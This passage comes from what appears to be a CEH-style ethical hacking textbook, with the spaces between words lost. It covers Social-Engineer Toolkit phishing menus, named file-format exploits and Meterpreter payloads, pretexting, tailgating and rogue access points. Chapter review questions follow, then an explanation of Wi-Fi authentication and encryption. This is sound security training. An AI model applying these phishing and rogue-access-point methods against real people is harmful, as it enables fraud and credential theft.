set>SelectingSocial-­EngineeringAttacksopensanothermenu,andtobeclear,thesearetext-­basedmenuswhereyouenterthenumberofthemenuitem.Theentireprogramhasseengrowthinwhatitcandoovertheyears.ThisiscertainlytrueinthenumberofvectorsavailableintheSocial-­EngineeringAttacksmenu,whichyoucanseeinthefollowinglisting.Youmaynoticethattherearetwophishingattackvectors.Oneisformassmailing,whiletheotherisforspearphishing.Thedifferenceisthenumberoftargetsyouareexpectingtomail.Social-­EngineerToolkitSocialEngineeringAttacksSelectfromthemenu: 1)Spear-­PhishingAttackVectors2)WebsiteAttackVectors3)InfectiousMediaGenerator4)CreateaPayloadandListener5)MassMailerAttack6)Arduino-­BasedAttackVector7)WirelessAccessPointAttackVector8)QRCodeGeneratorAttackVector9)PowershellAttackVectors10)SMSSpoofingAttackVector11)ThirdPartyModules 99)Returnbacktothemainmenu.Nomatterwhichoneyoupick,youwillbeabletosendtoeitherasingleaddressormultipleaddresses.Thedifferencesbetweenthetwooptionsareshowninthefollowingcodelistings.432 Chapter10  SocialEngineering■Spear-­phishingvector1)PerformaMassEmailAttack2)CreateaFileFormatPayload3)CreateaSocial-­EngineeringTemplateMassMailerVector1.2.E-­MailAttackSingleEmailAddressE-­MailAttackMassMailerWe’regoingtotakealookattheMassEmailAttackvectorbecausetheessentialswillbethesameacrossthedifferentemailattacks.TheMassEmailAttackletsususeafileformatexploit.ThepayloadsavailableareonesthatareinMetasploit.Inthefollowingcode,youwillseethepayloadsthatareavailabletoyou.Thesepayloadsarefileformatsthatarecommonlyexploitedandmayhaveagoodchanceofsuccess.Payloadsfor FileFormatExploit1)2)3)4)5)6)7)8)9)10)11)12)13)14)15)16)17)18)19)20)21)22)**********PAYLOADS********** SETCustomWrittenDLLHijackingAttackVector(RAR,ZIP)SETCustomWrittenDocumentUNCLMSMBCaptureAttackMS15-­100MicrosoftWindowsMediaCenterMCLVulnerabilityMS14-­017MicrosoftWordRTFObjectConfusion(2014-­04-­01)MicrosoftWindowsCreateSizedDIBSECTIONStackBufferOverflowMicrosoftWordRTFpFragmentsStackBufferOverflow(MS10-­087)AdobeFlashPlayer"Button"RemoteCodeExecutionAdobeCoolTypeSINGTable"uniqueName"OverflowAdobeFlashPlayer"newfunction"InvalidPointerUseAdobeCollab.collectEmailInfoBufferOverflowAdobeCollab.getIconBufferOverflowAdobeJBIG2DecodeMemoryCorruptionExploitAdobePDFEmbeddedEXESocialEngineeringAdobeutil.printf()BufferOverflowCustomEXEtoVBA(sentviaRAR)(RARrequired)AdobeU3DCLODProgressiveMeshDeclarationArrayOverrunAdobePDFEmbeddedEXESocialEngineering(NOJS)FoxitPDFReaderv4.1.1TitleStackBufferOverflowAppleQuickTimePICTPnSizeBufferOverflowNuancePDFReaderv6.0LaunchStackBufferOverflowAdobeReaderu3DMemoryCorruptionVulnerabilityMSCOMCTLActiveXBufferOverflow(ms12-­027)Summary 433Thefileformattellsushowwearegoingtoexploitthesystem.Thiswillletusrunarbitrarycodeontheremotesystem;wejustneedtodeterminewhatthatarbitrarycodeisgoingtobe.Ourpayloadisgoingtobebasedonthetypeoffileformatexploitwearegoingtouse.Ifweselectthefirstfileformattypeinthelist,wegetalistofpayloadswherethedefaultisaMeterpretermemoryinjection.ThispayloadprovidesaMeterpretershellbeingsentbacktous,aslongaswehaveahandlersetup.Phishingcanbeareliableattackvectorwhenitcomestosocialengineering,butit’snottheonlyone.Youmaynotevenbelookingtogetshellaccesstothetargetsystem.Fortunately,theSEThasalotofothercapabilities,asyoucouldseeintheinitialmenu.YoucouldevenautomatewirelessattacksusingSET.Whilethereareplentyofotherwaystoperformsocialengineeringattacks,thisisapowerfultoolthatleveragesthepayloadsandotherfunctionalityoftheMetasploitFrameworktomakeyourlifealoteasier.SummarySocialengineeringisaskillthathasbeenaroundforprobablyaslongastherehavebeenhumanswhohavewantsanddesires.Onceyouknowtheprinciplesofsocialengineering,youcanstarttorecognizeplaceswhereyouarebeingmanipulated.Theprinciplesofsocialengineeringarereciprocity,commitment,socialproof,authority,liking,andscarcity.Thesekeyprinciplescanbeusedtomanipulatepeopleintoperformingactstheymaynototherwisebeinclinedtoperform.Thiscanincludegivingyouaccesstosystemsorinformation.Itcouldalsobegivingupcredentialsthatyoumayneedtoperformotherattacks.Whenyouarepreparingasocialengineeringattack,pretextingisimportant.Pretextingiscreatingthestoryyouaregoingtobetelling.Youcanseeexamplesofpretextinginyouremailandeveninscamphonecalls.The419scamiscommonandagoodexampleofpretexting.Youarebeingtoldastory,andit’sastoryyouareinclinedtobuyinto,likelybecauseofthepromiseofmillionsofdollars.Who,afterall,wouldn’tliketohaveenoughmoneythattheycouldquittheirjobandgoliveonabeachinTahiti?Pretextingisjustthestoryyouaregoingtotellyourtargets.Agoodpretexthasalltheanglescoveredsoyouaren’tfumblingforananswerwhenyourtargetasksaquestionorraisesanobjection.Youhaveitallfiguredout.Thiscanrequireresearch,especiallyifyouaregoingafteremployeeswithinanorganizationwhomayhavebeengiventrainingtoprotectthemselvesandthecompanyagainstsocialengineeringattacks.Therearemanyformssocialengineeringcantake.Fourofthesearevishing,phishing,smishing,andimpersonation.Vishingistryingtogatherinformationoverthephone;phishingistheprocessofgatheringinformationthroughfraud,thoughcommonlyit’sthoughttoincludeemailasthedeliverymeans;smishingisusingtextmessages;andimpersonationispretendingtobesomeoneelse.Whilesomeoftheformsofsocialengineeringwillincludeimpersonationasacomponent,whenwetalkaboutimpersonationasasocialengineeringvector,we’retalkingaboutimpersonatingsomeoneelseinordertogainphysicalaccesstoabuildingorfacility.434 Chapter10  SocialEngineering■Gainingphysicalaccesstoafacilitymaybeanimportantelementinapenetrationtestorred-­teameffort.Youcanimpersonatesomeoneelse,buttherearemultipleprotectionsthatmaymakethatdifficult.Manybuildingstodayareprotectedbyrequiringabadgeswipetodemonstratethatyouarewhoyousayyouareandthatyouhavelegitimateaccesstothebuilding.Thiscanbeavoidedthroughtheuseoftailgating.Tailgatingmeansfollowingsomeoneelsethroughthedooraftertheyhaveopeneditwiththeirbadge.Amantrapcanprotectagainstthissortofentrance,ascanarevolvingdoorthatonlymakesaquarterturnforaswipedbadge.Biometricscanalsobeusedtoverifyidentity.Onceidentityhasbeendemonstrated,accesscanbegrantedasdefined.Websitescanbeusedasvectorsforsocialengineeringattacks.Thisisanotherareawhereimpersonationcanbeuseful.It’strivialtosetupacloneofanexistingwebsitebyjustcopyingalloftheresourcesfromthatsitetoanotherlocation.Oncethere,youcanaddadditionalcomponents,including“malicious”software,whichmaygiveyouremoteaccesstothetargetsystem.Youcanusetyposquattingattacks,usingadomainnamethatissimilartoarealdomainnamewithacommontypoaspartofthename.Youcanalsousewateringholeattacks,whichiswhereacommonlyvisitedsiteiscompromisedsowhenuserscometothesite,theymaygetinfected.Wirelessnetworkaccessiscommontoday,especiallywithsomanydevicesthatcan’tsupportwirednetworkaccess.Thisisanotherareawhereyoucanrunasocialengineeringattack.Youcansetuparogueaccesspointwithanenticingnametogetpeopletoconnectandgiveupinformation.YoucouldalsouseanexistingSSID,jammingaccesstotheauthenticaccesspoint.Thismeanslegitimateuserscanbeforcedtoattemptauthenticationagainstyouraccesspointandyoucangathercredentialsoranyotherinformation,sinceoncetheyareconnected,alloftheirtrafficwillbepassingthroughyoursystem.Whiletheseattackscanbedonemanually,itcanbeeasiertoautomatealotofthem.Therearesomegoodtoolstohelp.Theyincludewifiphisher,whichcanautomatethecreationofarogueaccesspoint.TheSETisanothertoolthatcanautomatesocialengineeringattacks.ItusesMetasploitandthepayloadsandmodulestosupporttheseattacks.ReviewQuestions 435ReviewQuestionsYoucanfindtheanswersintheappendix.1.YougetaphonecallfromsomeonetellingyoutheyarefromtheIRSandtheyaresendingthepolicetoyourhousenowtoarrestyouunlessyouprovideamethodofpaymentimmediately.Whattacticisthecallerusing?A.PretextingB.BiometricsC.SmishingD.Rogueaccess2.Youareworkingonared-­teamengagement.Yourteamleaderhasaskedyoutousebaitingasawaytogetin.Whatareyoubeingaskedtodo?A.MakephonecallsB.CloneawebsiteC.LeaveUSBsticksaroundD.SpoofanRFIDID3.WhichofthesocialengineeringprinciplesisinusewhenyouseealineofpeopleatavendorboothatasecurityconferencewaitingtograbfreeUSBsticksandCDs?A.ReciprocityB.SocialproofC.AuthorityD.Scarcity4.Whatisaviableapproachtoprotectingagainsttailgaiting?A.BiometricsB.BadgeaccessC.PhoneverificationD.Mantraps5.Whywouldyouusewirelesssocialengineering?A.TosendphishingmessagesB.TogathercredentialsC.TogetemailaddressesD.Tomakephonecalls6.Whichsocialengineeringprinciplemayallowaphonycallfromthehelpdesktobeeffective?A.SocialproofB.Imitation436 Chapter10  SocialEngineering■C.ScarcityD.Authority7.Whywouldyouuseautomatedtoolsforsocialengineeringattacks?A.BettercontroloveroutcomesB.ReducecomplexityC.ImplementsocialproofD.Demonstrateauthority8.Whatsocialengineeringvectorwouldyouuseifyouwantedtogainaccesstoabuilding?A.ImpersonationB.ScarcityC.VishingD.Smishing9.Whichofthesewouldbeanexampleofpretexting?A.WebpageaskingforcredentialsB.AclonedbadgeC.Anemailfromaformerco-­workerD.Roguewirelessaccesspoint10.Whattoolcouldyouusetocloneawebsite?A.httcloneB.curl-­getC.wgetD.wclone11.Howwouldsomeonekeepabaitingattackfrombeingsuccessful?A.DisableRegistrycloning.B.Disableautorun.C.Epoxyexternalports.D.Don’tbrowsetheInternet.12.Whatstatisticareyoumorelikelytobeconcernedaboutwhenthinkingaboutimplementingbiometrics?A.FalsepositiverateB.FalsenegativerateC.FalsefailurerateD.FalseacceptancerateReviewQuestions 43713.Whichoftheseformsofbiometricsisleastlikelytogiveahightrueacceptratewhileminimizingfalserejectrates?A.VoiceprintB.IrisscanningC.RetinalscanningD.Fingerprintscanning14.Whatattackcanaproximitycardbesusceptibleto?A.TailgatingB.PhishingC.CredentialtheftD.Cloning15.Whichformofbiometricsscansapatternintheareaoftheeyearoundthepupil?A.RetinalscanningB.FingerprintscanningC.IrisscanningD.Uveascanning16.Whatwouldtheresultofahighfalsefailureratebe?A.PeoplehavingtocallsecurityB.UnauthorizedpeoplebeingallowedinC.ForcingtheuseofamantrapD.Reductionintheuseofbiometrics17.You’vereceivedatextmessagefromanunknownnumberthatisonlyfivedigitslong.Itdoesn’thaveanytext,justaURL.Whatmightthisbeanexampleof?A.VishingB.SmishingC.PhishingD.Impersonation18.Whatisanadvantageofaphonecalloveraphishingemail?A.Youareabletogointomoredetailwithpretexting.B.Phishingattacksareunreliable.C.Noteveryonehasemail,buteveryonehasaphone.D.Pretextingworksonlyoverthephone.438 Chapter10  SocialEngineering■19.Whatisthewebpageyoumaybepresentedwithwhenconnectingtoawirelessaccesspoint,especiallyinapublicplace?A.CredentialharvesterB.CaptiveportalC.Wi-­FiportalD.Authenticationpoint20.Whattoolcouldyouusetogenerateemailattacksaswellaswirelessattacks?A.MeterpreterB.wifiphisherC.SEToolkitD.SocialAutomatorChapter11WirelessSecurityTHEFOLLOWINGCEHEXAMTOPICSARECOVEREDINTHISCHAPTER:✓✓Wirelessaccesstechnology✓✓Networktopologies✓✓Communicationonprotocols✓✓Mobiletechnologies✓✓SecuritypolicyimplicationsTherewasatimewhenyouneededactualphysicalaccesstoa facilitytogetontoacompany’snetwork.Thisisnolongertrue.Thesedays,youlikelyjustneedphysicalproximity.Wirelessnetworksareubiquitous,especiallyasdevicesthathavenoabilitytotakeinatraditionalwiredconnectionbecomemorepredominant.Theproblemwithwirelessnetworks,though,isthattheyuseradiowavesasthetransmissionmedium.Thesignalstrengthisn’tnearlythesameasanAMorFMsignalyouwouldpickupwitharadioyouwouldlistento.Theprincipleisthesame,though.Asignalissentfromatransmitterthroughtheair,andareceivergetsthesignal,aslongasthereceiveriswithinrange.Becausetheyarejustradiosignals,theycanbeinterceptedifyouarewithinrangeofthetransmitter.Youcanalsosendyourownsignals.WhatwetraditionallycallWirelessFidelity(Wi-­Fi)isasetofspecificationscategorizedas802.11thataremanagedbytheInstituteofElectricalandElectronicsEngineers(IEEE).802.11isnottheonlysetofwirelessspecifications,however.AnothercommunicationsprotocolthatuseswirelesssignalsfortransmissionisBluetooth.Bothofthesearecommonandcaneasilybemisconfigured.Evenwithoutmisconfigurations,thereareenoughissuesintheprotocolsthemselvestoopenupthepossibilityofcompromise.Thesemeansofcommunicationshavebecomeessentialforbusinessoperations,buttheyareexposed.It’simportanttounderstandtheprotocolsaswellashowtheprotocolscanbecompromised.Usingatleastoneofthem,youmaybeabletogetintosystemsandnetworksaslongasyouhavephysicalproximity.Wi-­FiWi-­FiencompassesthesetofstandardsthatfallundertheIEEE’s802.11.Wi-­FiisactuallyatrademarkoftheWi-­FiAllianceandisusedfordevicesthathavepassedcertificationtests.WhetheryoucallitWi-­Fior802.11,we’retalkingaboutthesamething—­networkconnectivityoverawirelessconnection.Thismakesitseemstraightforward,andingeneral,ifyouareusingit,itis.However,Wi-­Fihasbeenthroughseveralversionssinceitsintroduction,andsubstantialchangestohowWi-­Fioperateshavebeenmadeinsomeofthoseversions.First,802.11isasetofspecificationsforthePhysicalandDataLinklayers.ThePhysicallayerspecifiesthemodulationschemesusedtotransmitthedataandalsospecifiesthefrequencyspectrumused.Thefirstversionof802.11specifiedtransmissioninthe2.4 GHzrangewithdataratesbetween1and2 megabitspersecond.Thisfrequencyrangeisthesameasthatusedbyothertechnologies,sinceitfallsintotheindustrial,scientific,andmedical(ISM)band.DeviceslikemicrowavesandsomecordlessphonesoperatewithinthesameWi-­Fi 441frequencyspectrumasBluetoothdevicesandWi-­Fi,makingitalittlecrowdedandleadingtothepotentialforconflict.Whileanearlyversion,802.11a,supportedtransmissioninthe5 GHzand2.4 GHzranges,itwasn’twidelyimplemented,especiallyintheconsumerspace.Itwasn’tuntil2009,when802.11nwasreleased,that5 GHzbecameaviablefrequencytouseforWi-­Finetworks.Sincethen,802.11acandtheproposed802.11axhavebothbeenspecifiedtoworkinthe5 GHzrange.Thiscausesissues,ofcourse,sinceolderradiosinWi-­Fiinterfaceswon’tworkonanythingotherthanthefrequencytheyhavebeentunedto.Ifanetworkdecidedtoadopt802.11acinthe5 GHzrangebuttheystillhadanumberof802.11gcards,thosecardswouldnotbeabletoconnecttothenewnetwork.802.11nmadesignificantjumpsinthedatathroughputcapabilityofwirelessinterfaces.Itwasabletodothisthroughtheuseofmultipleinput,multipleoutput(MIMO).Thismeantaninterfacecouldusemultiplechannelsforinputandoutputandbindthemtogether.Insteadofbeinglimitedto54 Mbitspersecond,itwaspossibletogetspeedsupto600 Mbitspersecondusing802.11n.IfyouraccesspointsupportedMIMObutyourcarddidnot,youwouldstillbelimitedtothelowerbandwidthsbecauseyourcardwasnotcapableofdoinganythingbetterthanasinglechannelat54 Mbitspersecond,atamaximum.802.11useschannelstopreventonesetofsignalsfromclobberinganotherset.IntheUnitedStates,thereare11channelsthatcanbeusedforWi-­Ficommunicationsinthe2.4 GHzband.Achannelisaboundedrangeoffrequencies,muchlikechannelsonaTVoraparticularradiostation.Eachofthoseisallocatedarangeoffrequenciesonwhichtotransmit,dependingontheamountofbandwidthneeded.Somepartsoftheworldareallowedtouse13channels.Thisisdependentontheregulatorybodythatmanagesthefrequencyspectrumforelectromagnetictransmissions.Ifyouareusingaversionof802.11thatsupportstransmissioninthe5 GHzrange,thereareotherchannelsthatareavailable,thoughthatalsovariesfromonecountrytoanother.Thereislessconsistencyregardingtheuseofthe5 GHzrangearoundtheworldthanthereiswiththe2.4 GHzrange.Laterversionsof802.11operateorwilloperateinthe60 GHzrange,andtherearesixchannelsforuseinthatrange.Anotheraspectthatvariesfromoneversionof802.11toanotheristhedistancethesignalisexpectedtotravel.Someofthe802.11versionswillcarryonly11feetorso.Othersareexpectedtocarryuptoacoupleofhundredfeet.Thisvariesquiteabitdependingonthenumberofwallsandthecompositionofthewalls.AWi-­Fisignalcancarryquiteabitfartheroutsidebecausethereisnothingtoimpedethesignal.Insideisaverydifferentstory.Intermsofcapturingsignalwithoutactuallybeinginthebuilding,howfarfromthebuildingyouneedtobewilldependonhowclosethenearestaccesspointistoanexternalwallandhowmanywindowsthereare.Windowswouldgenerallyallowthesignaltopassoutunimpeded.TherearetwodifferentwaystosetupWi-­Finetworksfromatopologicalperspective.Oneoftheseisfarmorecommonthantheother,butit’sstillpossibletoseeboth.Beyondthat,youneedtobeconcernedwithhowtheWi-­Finetworkhandlesauthenticationandencryption.Bothauthenticationandencryptionmechanismsprovidepossiblewaystoattack442 Chapter11  WirelessSecurity■thewirelessnetwork.Thisisespeciallytrueincaseswherecompaniesallowemployeestoattachtheirowndevicestothecorporatenetwork.TestingTipIfyouareusingWi-­Fitesting,itishelpfultohaveasecondWi-­FiinterfaceifyouareusingWi-­Fiasyourprimarymeansofaccessingthenetwork.Ifyouaretryingtotestwiththesameinterfaceyouareotherwiseconnectedtothenetworkwith,youmayendupwithabumpyride.YoucaneasilygetasecondaryWi-­FiinterfacethatconnectswithUSB.Thiswayyoucandoyourtestingoveroneinterfacewithoutdisconnectingyournetworkconnectionsoveryourprimaryinterface.Wi-­FiNetworkTypesTherearetwotypesofwirelessnetworksyouaregoingtoruninto.Wecantalkabouttopologyherebecauseit’stechnicallyrelevant,thoughitmaybehardertoconceptualizethanwithwirednetworks.Let’sgiveitashot,though.Thefirsttypeofnetwork,andonethatislesscommon,especiallyinabusinessenvironment,isanadhocnetwork.Anadhocnetworkisonethatexistswithoutanycentralroutingorswitchingdevice.Figure 11.1showsanadhocwirelessnetworkwithdifferentdevicetypesconnectedtoit.Youcanthinkofitasadynamicmeshnetwork.Eachdevicecommunicatesdirectlywithanotherdevice.Theconnectionsarestoodupdynamicallyastwodeviceshaveaneedtotalktooneanother.Whenadevicecomesontothenetwork,itsharesitsinformationwiththeotherdevices.Theythenknowhowtomakeaconnectiontothatdeviceiftheyneedto.FIGURE 11.1 WirelessadhocnetworkWi-­Fi 443Thisisnottosaythatanyonecanconnecttoanadhocnetwork.Whenanadhocnetworkisstartedupbysomeone,theyhavetogivethenetworkaname.Inadditiontothenetworkname,apasswordmayberequiredtogainaccess.Inanadhocnetwork,allthedeviceshavetobewithinrangeofeachotherbecausethereisnothingelseinplacetoforwardmessagestootherdevicesatadistance.Whileadhocnetworksareeasytosetupandtheycanbefast,managingthemisdifficult,andtheyarecertainlynotsuitableforanenterpriseenvironment.Instead,thereareinfrastructurenetworks.Aninfrastructurenetworkhasacentraldevice,whichactslikeaswitch.Computersdon’ttalktooneanotherdirectly.Instead,allmessagesgothroughanaccesspoint.Figure 11.2showsaninfrastructure-­basednetwork.Thedifferencebetween aswitchandanaccesspointisthattheswitchcontrolstheelectricalsignal.Sincethat’sthecase,theswitchreallydoesdeterminewhetherasystemgetsthetrafficornot.Anaccesspointhasnocontroloverwhethersystemsseethetrafficornotbecauseeverythingisintheair.Theonlythingyouneedtoseeitisaradiothatcancatchthesignals.FIGURE 11.2 WirelessinfrastructurenetworkTodemonstratethatidea,takealookatFigure 11.3.ThisisaWiresharkcapturewithmonitormodeenabledonthewirelessinterface.ThismeansWiresharkgetseverythingdowntotheradioheaders,whichisthelayer1/2setofheadersfortheframe.Thisparticularsystemisnotconnectedtoanywirelessnetwork.Youcanthinkofthatashavingawiredinterfacebeingdisconnected.Asthat’sthecase,Wiresharkshouldn’tbeseeinganything,andifmonitormodewasturnedoff,evenwithpromiscuousmodeon,therewouldn’tbeanythinginthecapture.444 Chapter11  WirelessSecurity■FIGURE 11.3 WiresharkcaptureofradiotrafficWhatyoucanseeinthecapture,though,isalotoftraffic.Thisisbecausewirelessnetworksareverychatty.Theyhavetobebecausethereisnoelectricalconnectionthattellsasystemthereisanetworkinplace.Oncemonitormodeison,though,youcanseethemessagesbetweentheaccesspointandtheclients.Forexample,accesspointssendoutbeaconframesperiodically.Theseareusedtoannouncethepresenceofthenetworkinthearea.Additionally,clientswillsendoutproberequeststoidentifynetworksinthearea.Whenaproberequestissentout,theaccesspointwillsendoutaproberesponse.Ifyoupullupalistofthewirelessnetworksinthearea,youmayseeyouroperatingsystem,indicatingthatitislookingfornetworksinthearea.Thismeansitissendingoutprobemessages.Toconnecttoanetwork,youneedtofirstidentifythenetwork.WiresharkCaptureEnableamonitormodeinWiresharkonyourwirelessnetworkinterfaceandcapturetraffic.Observetheradiotransmissionsthatpassbackandforthbetweenyoursystemandyouraccesspoint.Disconnectfromyourwirelessnetwork,andthenreconnect.Observetheradiotrafficbetweenasyoureauthenticatetothenetwork.Wi-­Fi 445Wi-­FiAuthenticationTherearedifferentformsofauthenticationthathappenonWi-­Finetworks.Thefirstwearegoingtogooverisasimplemachine-­levelauthentication.Thisiswhereyourclientassociateswiththenetwork.Forthattohappen,yoursystemwillsendoutproberequeststoidentifywirelessnetworksinthearea.Yourclientislookingforaservicesetidentifier(SSID),whichisessentiallythenameofyournetwork.TheremaybemultipleaccesspointsinanetworkthatcarrythesameSSID,though,sinceyoumayhavealargefacilityandthesignalfromasingleaccesspointisn’tenoughtocarrythroughallofit.TodistinguishfromoneaccesspointtoanotherwhentheyareusingthesameSSID,thereisabaseservicesetidentifier(BSSID).ThislookslikeaMACaddressandprovidesawayforaclienttocommunicatewithaspecificaccesspoint,asneeded.YoucanseeanexampleofmultipleBSSIDsusingthesameSSIDinFigure 11.4.FIGURE 11.4 MultipleBSSIDsforasingleSSIDTheprocessforgettingyourclientconnectedtotheaccesspointrequiresthatitauthenticatewiththeaccesspoint.Thismaybeasimpleprocess,particularlyiftheaccesspointhasOpenAuthenticationenabled.Thisisdonetoallowtheclienttostarttheconversationwiththenetwork.Actualauthentication,particularlyattheuserlevel,happenslater.Theclientsendsanauthenticationrequest,andtheaccesspointwilltypicallyrespondwithanauthenticationresponseindicating“Successful.”Thisallowstheclienttomovetothenextstage.Oncetheclienthasbeenauthenticated,thenextstepistoassociatetheclientwiththenetwork.Thisinvolvestheclientsendinganassociationrequesttotheaccesspoint.Intheassociationrequest,theclient,orstationasitmaybecalled,sendsitscapabilities.Thiswouldincludetheversionsandspeedsitsupports.Thisallowsfortheaccesspointandthestationtonegotiatethewaytheyaregoingtocommunicategoingforward.InFigure 11.5,youcanseeadiagramoftheprocessthatisrequiredtogetthestationauthenticatedandassociatedwiththeaccesspoint.446 Chapter11  WirelessSecurity■FIGURE 11.5 AuthenticationandassociationstepsClient/StationAccessPointAuthenticationRequestAuthenticationResponseAssociationRequestAssociationResponseOfcourse,thisisonlypartoftheprocessrequiredtogetastationontothenetwork.Thereisprobablyalsouser-­levelauthenticationthat’srequired.ThisauthenticationmaymakeuseoftheIEEE’s802.1Xstandard.802.1Xallowsfornetwork-­levelauthentication.Itcanalsobeusedonwirednetworkstoensurethattherearen’troguedevicesinuse.ThenewerversionsofWi-­Fiencryptionsupportenterpriseauthentication,whichmayuse802.1Xtoensurethattheuserisauthorizedtogetaccesstothenetwork.Wi-­FiEncryptionAninitialconcernaboutwirelessnetworks,especiallywhenthetechnologystartedtobeofferedforcommercialuse,wasprivacy.Wirednetworkswereconsideredtobeprivatebecauseinordertoseeanyofthetransmissionsoverawirednetwork,anattackerhadtohavephysicalaccesstothenetwork.Whilethiswasn’tentirelytrue,therewasstillarequirementtoprovidesimilarprivacytowirelessnetworks.WiredEquivalentPrivacy(WEP)wasborn.WEPusedeithera40-­bitkeyora104-­bitkey.The40-­bitkeywasconcatenatedwitha24-­bitinitializationvector,addingrandomizationtothepre-­sharedkey(PSK)valuetocreatea64-­bitkeyfortheRivestCipher4(RC4)encryptionalgorithm.Whenyouconfiguredanencryptionkeyintoanaccesspoint,youentered10hexadecimaldigits.Eachhexadecimaldigitis4bits,so10hexadecimaldigitsisthe40bitsneeded.ThekeyvalueissmallbecauseofU.S.governmentrestrictionsonexportsofcryptography.Thoserestrictionswereeventuallylifted,allowingalargerkeyvalue.Onceencryptionrestrictionswerelifted,vendorscouldusea104-­bitkeyprovidedby thenetworkadministrator.Alongwiththe24-­bitinitializationvector,thatcreateda128-­bitkey,doublingthekeylengthbutexponentiallyincreasingthestrengthofthekey.Thatassumed,Wi-­Fi 447however,thattheinitializationvectorwastrulyrandom.Asitturnsout, theinitializationvectorusedbyWEPwasnottrulyrandom.Thismeantthatwithenoughdata,thekeycouldbedetermined,leadingtoWEPencryptionbeingcracked.Fortunately,thereareotherencryptionmechanismsthatcanbeused.Wi-­FiProtectedAccessEncryptioniscomplex,andencryptionschemesareunderconstantscrutiny.Asnoted,WEPwascracked.Improvementsintechnology,especiallycomputingpower,havemadecrackingencryptionmucheasier,whichgenerallylimitstheshelflifeofnewencryptionmechanisms.Becauseofthat,youmayunderstandwhyitistime-­consumingtodevelopnewwaystoencryptdata.WEPwasconsideredproblematic,butitcouldn’tbeswappedoutwithalong-­termsolutioneasily.Asastopgapmeasure,theWi-­FiAlliancereleasedWi-­FiProtectedAccess(WPA).WPAcouldbeimplementedwithoutanyhardwarechanges.ThehardwarethatallowedWEPtofunctioncouldalsobeusedforWPA.WPAcouldbeenabledwithafirmwareupgrade.WPAintroducedtheTemporalKeyIntegrityProtocol(TKIP).WhereWEPconcatenatedtheinitializationvectorwiththePSK,TKIPmixedthekeys.ThisispartofwhatallowedWEP-­enableddevicestoworkwithWPA.Thesamekey,derivedinadifferentway,couldbefedintothesameRC4algorithmtoperformtheencryptionofmessages.TKIPalsodoesn’tuseasessionkey,asiscommoninothercryptosystems.Instead,itusesaper-­packetkey.Eachpackethasitsownkeyforencryptionanddecryption.Thisisthetemporalpart,sinceeachkeyistimebound.ThiswasmeanttoaddressoneoftheissueswithWEP,whereacollectionofframescouldyieldenoughdatatoderivethekeybecauseoftheweaknessintheinitializationvectoralgorithm.Asfarastheintegritygoes,messagesintransitcouldbeinterceptedandaltered.WEPusedacyclicredundancycheck(CRC)toverifytheintegrityofthemessage.Thiswasconsideredinadequate.Instead,WPAimplementedamessageintegritycheck(MIC),whichissometimescalledamessageauthenticationcode(MAC).Thisisnottobeconfusedwiththemediaaccesscontrol(MAC)address.ThisMACismeanttoverifytheintegrityandauthenticityofthemessagethathasbeensent.ThereceivingpartychecksitsowncalculationoftheMACagainsttheoneincludedwiththemessage.IftheMACsmatch,themessagehasnotbeentamperedwithorotherwisecorruptedintransit.WPAsupportstwomodesofauthentication.Thefirstonefunctionsessentially thesame asthekeyusedinWEPandiscalledWPA-­Personal.ThisisaPSKmethod.The PSKfunctionsasapasswordandalsoprovidesthekeythatisusedwiththeinitializationvectortogeneratetheencryptionkeyusedwiththeRC4encryptionalgorithm.Thesecondmodeofauthentication,calledWPA-­Enterprise,usestheExtensibleAuthenticationProtocol(EAP).EAPcanbeusedtosupportdifferentbackendpasswordstorage.Asanexample,youcanuseWPA-­Enterprisewithyourexistingenterpriseuserdatabaseandauthenticationscheme,suchasWindowsActiveDirectory.EAPisusedtotransmitauthenticationinformationalongwithsuccessorfailureresponses.AnothermeansofauthenticationisWi-­FiProtectedSetup(WPS).Thiscanrequirephysicalcontroloftheaccesspoint,sinceitmayinvolvepushingabutton.Theremayalsobe448 Chapter11  WirelessSecurity■apersonalidentificationnumber(PIN)neededtocompleteWPS.Itisusedtohandlekeydistributionsotheusersoftheclientdevicesdon’tknowwhatthekeyis.Thekeyisstoredwiththeendpointandisusedtocommunicatewiththeaccesspointwhendevicescomeonline.ThereareissueswithWPS,however.ThePINusedwithWPScanberecoveredduetoproblemswiththeimplementationofWPS.Wi-­FiProtectedAccess2Wi-­FiProtectedAccess2(WPA2)isastandardthatwasratifiedasIEEE802.11i-­2004,whichmeansit’sanamendmenttotheoriginal802.11.Therehavebeenseveralotheramendments,includingonesthatprovidethecapabilitytohandleMIMOstreamsaswellasdifferentchannelsandbandwidths.Youmaybefamiliarwiththemas802.11b,802.11g,802.11n,andothers.WPA2 wasintendedtobethelong-­termsolutiontotheproblemswith WEP.SomeoftheproblemswithWEPcontinuedwiththeuseofWPA,sinceWPAcontinuedtousetheRC4streamcipher.Thisisanolderencryptioncipher,andWPAisstillusedasaninitializationvector.Apoorlyimplementedinitializationvectorcanleadtogettingkeysderived,justaswithWEP.WPA2improvestheoverallsecurityoftheencryptionimplementationforWi-­Fi.Oneofthebiggestissueswithencryptionhasalwaysbeenprotectionofthekey.WPA2 introducesafour-­wayhandshakethatdidn’texistinearlierimplementations.Thefour-­wayhandshakeismeanttoimprovetheprotectionofthekey.Therearetwokeysthatareusedthroughthisprocess.Thefirstisthepairwisemasterkey(PMK),whichisretainedovertimesoithastobeprotectedandnottransmitted.Thekeythatgetsderivedisthepairwisetransientkey(PTK).Thereisalsoagrouptemporalkey(GTK)thatcomesoutofthehandshake;itisusedforbroadcastormulticasttraffic,meaningit’sakeythatissharedacrossmultipledevices.Figure 11.6showsadiagramofwhatthefour-­wayhandshakeprocesslookslike.First,theaccesspointgeneratesanonce,whichisanephemeral,randomvalue.Theaccesspointsendsitsnoncetothestation,alongwithakeyreplaycounter,whichisusedtomatchmessagesthataresentsoanyreplayedmessagescangetdiscarded.ThestationhaswhatitneedsatthispointtogeneratethePTK.Thestationgeneratesitsownnonceandsendsittotheaccesspoint,alongwiththekeyreplaycounterthatmatchestheonesentbytheaccesspoint.Thestationalsosendsamessageintegritycode(MIC,amessageauthenticationcode)toensurethereisnotamperingwiththemessagethatissent.Oncetheaccesspointhasthestation’snonce,itcanderiveitsownPTK.TheaccesspointsendstheGTKontothestation,alongwithanMIC.Thestationsendsalonganacknowledgment,andthefour-­wayhandshakeiscomplete.Thefour-­wayhandshakecompletesauthentication,sinceyouhavetohavetherightkeysinordertobeabletocompletethehandshake.JustaswithWPA,thereisPersonalandEnterpriseauthenticationavailable,andthehandshakeprocessisthesame,nomatterwhichmethodofauthenticationisavailable.Personalrequiresapre-­sharedkey.Enterpriseauthenticationuses802.1Xtohandleuser-­levelauthentication,meaningsomeoneconnectingtothenetworkhastoprovideausernameandpa